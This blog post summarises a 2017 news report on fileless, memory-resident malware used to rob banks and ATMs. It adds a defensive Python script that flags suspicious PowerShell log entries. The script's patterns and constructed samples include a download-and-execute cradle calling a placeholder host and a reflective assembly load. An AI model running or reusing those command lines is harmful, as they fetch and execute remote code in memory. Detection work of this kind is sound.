The ‘Invisible’ Malware That Allows Hackers To Remotely Control ATMs: Experts Warn Software Has Already Infected At Least 140 Banks In 40 Countries Around The World
Stacy Liberatore writes in the February 9, 2017 edition of the Daily Mail Online about a new technique/tool that cyber criminals are using to steal cash from automatic teller machines (ATMs) across the globe. The malware hides itself in the computer’s memory to avoid detection; and, thus far, investigators haven’t been able to forensically pinpoint who is responsible for this wave of cyber theft. Kaspersky Lab, a cyber security firm based in Russia, was the first company/entity to diagnose the hacking technique, the Daily Mail noted. “The use of open source exploit code, common Windows utilities, and unknown domains makes it almost impossible to determine the group responsible — or even whether it is a single group, or several groups sharing the same [hacking] tools” and techniques. “The attack [hack] uses only legitimate software: widely available penetration-testing and administrator tools, as well as the PowerShell framework for task automation in Windows,” the Daily Mail reported. “Unlike most other attacks, it drops no malware files onto the hard drive; and instead hides them in memory. This combined approach helps to avoid detection by white-listing technologies; and leaves [cyber] forensic investigators with almost no artefacts [their spelling] [clues] or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot.”
Ms. Liberatore writes that “the code hides in the memory, invisibly collecting the passwords of system administrators, so that the attackers [hackers] could remotely control the victims’ systems.” “The ultimate goal appears to have been access to financial processes,” Kaspersky said. “What’s interesting here is that these attacks are ongoing globally, against the banks themselves,” Kaspersky Lab expert Kurt Baumgartner told the cyber security website Ars Technica. “The banks have not been adequately prepared, in many cases, to deal with this,” Mr. Baumgartner added. “They are pushing money out of the banks, and from within the banks — by targeting computers that operate automatic teller machines (ATMs).”
Kaspersky Lab also determined that the invisible malware was “being injected into networks using the systems’ [the banks’] own administrative and security tools,” Ms. Liberatore wrote. “Once installed, the malware disappears and renames itself when the computer is rebooted — allowing it to go undetected for months.”
“The determination of the hackers to hide their activity and make detection and incident response increasingly difficult explains the latest trend of anti-forensic techniques and memory-based malware,” said Sergey Golovanov, Principal Researcher at Kaspersky Lab. “This is why memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents [the attackers] used every conceivable anti-forensic technique: demonstrating how no malware files are needed for the successful exfiltration of data from a network; and how the use of legitimate and open source utilities makes attribution almost impossible.” And these attacks are still continuing, and are likely to persist — unless and until either the culprits are identified, caught and arrested — not likely anytime soon — or a new cyber intrusion tool/technique is developed that makes this kind of attack much more difficult to pull off and/or succeed.
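The anti-forensic pattern Golovanov describes, legitimate PowerShell run with nothing written to disk, is why defenders pair memory forensics with script-block and process-creation logging: the interpreter's launch flags and the script text it executes are often the only durable trace. The Python triage script below is an added example for this post, not code from Kaspersky Lab, the Daily Mail or any of the people quoted. It scans log records for launch flags and payload features associated with memory-only execution, decodes -EncodedCommand payloads (PowerShell expects base64 of UTF-16LE) so that encoding does not hide the script text, and scores each record. The sample records are constructed for illustration and are not from any real incident; the indicator names, weights and threshold are this example's own assumptions, not a published rule set.

```python
"""Triage of PowerShell log records for signs of memory-only execution.

Added example for this post; not code from Kaspersky Lab or the Daily Mail.
All records, indicator names, weights and thresholds here are constructed
assumptions for illustration.
"""
import base64
import binascii
import re

# Weak indicators describe how the interpreter was launched; strong ones describe
# content that only makes sense when code is meant to live in memory, not on disk.
WEAK_INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop(?:rofile)?\b",
    "policy_bypass": r"-e(?:xecution)?p(?:olicy)?\s+bypass",
    "invoke_expression": r"\b(?:iex|invoke-expression)\b",
    "download_cradle": r"\b(?:downloadstring|downloadfile|invoke-webrequest)\b",
}
STRONG_INDICATORS = {
    "encoded_command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]+",
    "reflective_load": r"\[(?:system\.)?reflection\.assembly\]::load",
}
_PATTERNS = {name: re.compile(rx, re.IGNORECASE)
             for name, rx in {**WEAK_INDICATORS, **STRONG_INDICATORS}.items()}
_ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FLAG_THRESHOLD = 2  # one strong indicator, or two weak ones (assumed weighting)


def encode_powershell_command(script: str) -> str:
    """Build the base64 form that -EncodedCommand expects (UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(text: str):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    match = _ENCODED_RE.search(text)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # truncated or non-base64 blob: keep the flag, drop the text


def find_indicators(text: str) -> set:
    """Names of every indicator pattern that matches the given text."""
    return {name for name, rx in _PATTERNS.items() if rx.search(text)}


def analyse_event(event: dict) -> dict:
    """Score one record; decoded payloads are scanned too so encoding hides nothing."""
    decoded = decode_encoded_command(event["text"])
    hits = find_indicators(event["text"])
    if decoded:
        hits |= find_indicators(decoded)
    score = sum(2 if h in STRONG_INDICATORS else 1 for h in hits)
    return {"id": event["id"], "host": event["host"], "user": event["user"],
            "indicators": sorted(hits), "score": score, "decoded": decoded,
            "flagged": score >= FLAG_THRESHOLD}


def triage(events):
    """Return only the records that reach the flag threshold, in input order."""
    return [r for r in (analyse_event(e) for e in events) if r["flagged"]]


# Constructed script text used only to build sample record 2 below.
CONSTRUCTED_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"

# Constructed records modelled on PowerShell script-block and process-creation
# logging. Host names, users and command lines are invented for this example.
SAMPLE_EVENTS = [
    {"id": 1, "host": "teller-ws01", "user": "svc_backup",
     "text": "Get-ChildItem C:\\Reports | Measure-Object"},
    {"id": 2, "host": "teller-ws01", "user": "svc_backup",
     "text": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
             + encode_powershell_command(CONSTRUCTED_SCRIPT)},
    {"id": 3, "host": "atm-ctrl02", "user": "admin_ops",
     "text": "$asm = [System.Reflection.Assembly]::Load($bytes); $asm.EntryPoint.Invoke($null, $null)"},
    {"id": 4, "host": "branch-srv01", "user": "admin_ops",
     "text": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-report.ps1"},
    {"id": 5, "host": "atm-ctrl02", "user": "svc_backup",
     "text": "powershell.exe -enc ZZZZ"},  # malformed blob: still worth a look
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"event {r['id']} on {r['host']} as {r['user']}: score {r['score']} "
              f"{r['indicators']} decoded={r['decoded']!r}")
```

Record 4 shows why a single launch flag is scored but not flagged on its own: an execution-policy override on a scheduled report script is routine administration, and alerting on it alone would bury the records that matter. Record 5 shows the opposite edge: a blob that will not decode is still reported, because an analyst needs to see it rather than have the decoder silently drop it. In a real deployment the records would come from the Windows event log rather than an inline list, and the threshold would be tuned against the host's normal administrative activity.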
This particular hack/attack has been identified in at least 40 countries, and has victimized at least 140 financial institutions and banks across the globe — though cyber security experts believe these numbers are likely lower than what is really occurring or has been reported. “The U.S., France, the U.K., Ecuador, and Kenya are the top five nations affected by the hack, with the U.S. being the hardest hit, with 21 incidents,” the Daily Mail reported.
It is too bad that we do not yet have a digital money version of the exploding dye packs used to protect paper money. Using the banks’ own system administrator credentials and tools makes this kind of cyber attack very clever, elegant, and hard to discover — at least in the early days and months. Indeed, of the 140 or so financial institutions and banks, the malware used in these attacks had been in their networks for an average of at least six months before cyber forensic investigators were able to pinpoint the reason their ATMs were dispensing cash without proper authorization. Although not said, I would also guess that the cyber thieves hid, or attempted to hide, the fact that they were stealing cash from these same institutions — by taking the money in small amounts and at times of peak use, in order to blend in with legitimate cash withdrawals. If we cannot devise digital dye, it might be useful to come up with some kind of digital tags that could perhaps be traced back to the original source of the illegitimate transaction. Or, is this an area where digital currency like Bitcoin could make carrying out these kinds of theft more difficult? I do not know and defer to those of you who understand this kind of hack, and whether or not digital money such as Bitcoin would make this kind of attack much more difficult to do. Until then, the darker angels of our nature still have a strong position in this complex and sophisticated ‘game’ of digital ‘cat-and-mouse.’ V/R, RCP